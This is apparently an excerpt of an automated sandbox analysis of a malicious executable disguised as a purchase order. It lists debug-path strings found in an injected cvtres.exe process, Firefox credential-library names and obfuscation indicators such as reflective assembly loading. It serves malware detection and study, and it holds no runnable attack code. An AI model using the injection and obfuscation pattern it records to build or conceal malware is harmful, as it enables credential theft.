Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266752483.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283698525.000000000824C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267651225.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: cvtres.exe, 00000001.00000003.276245137.00000000066AC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.290995859.0000000007858000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\NMCVXCXMXKJDFGDJKJDF.pdbBSJB source: NUEVA ORDEN-MATSA 10-2022,.exe
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265957997.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268301473.000000000788C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268329300.0000000007874000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284181718.00000000075E0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.264406495.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277974574.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267505452.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\NMCVXCXMXKJDFGDJKJDF.pdb source: NUEVA ORDEN-MATSA 10-2022,.exe
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270034811.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270237118.0000000006694000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266283140.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: cvtres.exe, 00000001.00000003.273084362.00000000084C0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289682200.0000000008280000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275089189.00000000083A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BROTHERS.pdbBSJB source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266909184.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BROTHERS.pdb source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265791708.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.267391292.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278239292.00000000081F8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265263773.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278227969.00000000081F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283893964.000000000826C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268086743.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266110570.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265641906.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: cvtres.exe, 00000001.00000003.276245137.00000000066AC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.290995859.0000000007858000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283893964.000000000826C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283972789.0000000008270000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266461893.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283512359.0000000008234000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267167676.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266581701.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270034811.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270237118.0000000006694000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264625947.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268329300.0000000007874000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265086491.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264949325.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278227969.00000000081F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.267898785.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283784153.000000000825C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268979819.0000000007870000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation

Source: NUEVA ORDEN-MATSA 10-2022,.exe, A/c0a43d74762739676b89f90c9ce1afd20.cs .Net Code: c5175757267e421e06d6570ba39442962 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.NUEVA ORDEN-MATSA 10-2022,.exe.760000.0.unpack, A/c0a43d74762739676b89f90c9ce1afd20.cs .Net Code: c5175757267e421e06d6570ba39442962 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040D86E push 0040D89Ch; ret 1_2_0040D894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040D870 push 0040D89Ch; ret 1_2_0040D894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004140C0 push 004140ECh; ret 1_2_004140E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004108C8 push 004108F4h; ret 1_2_004108EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040B0F7 push 0040B124h; ret 1_2_0040B11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040B0F8 push 0040B124h; ret 1_2_0040B11C
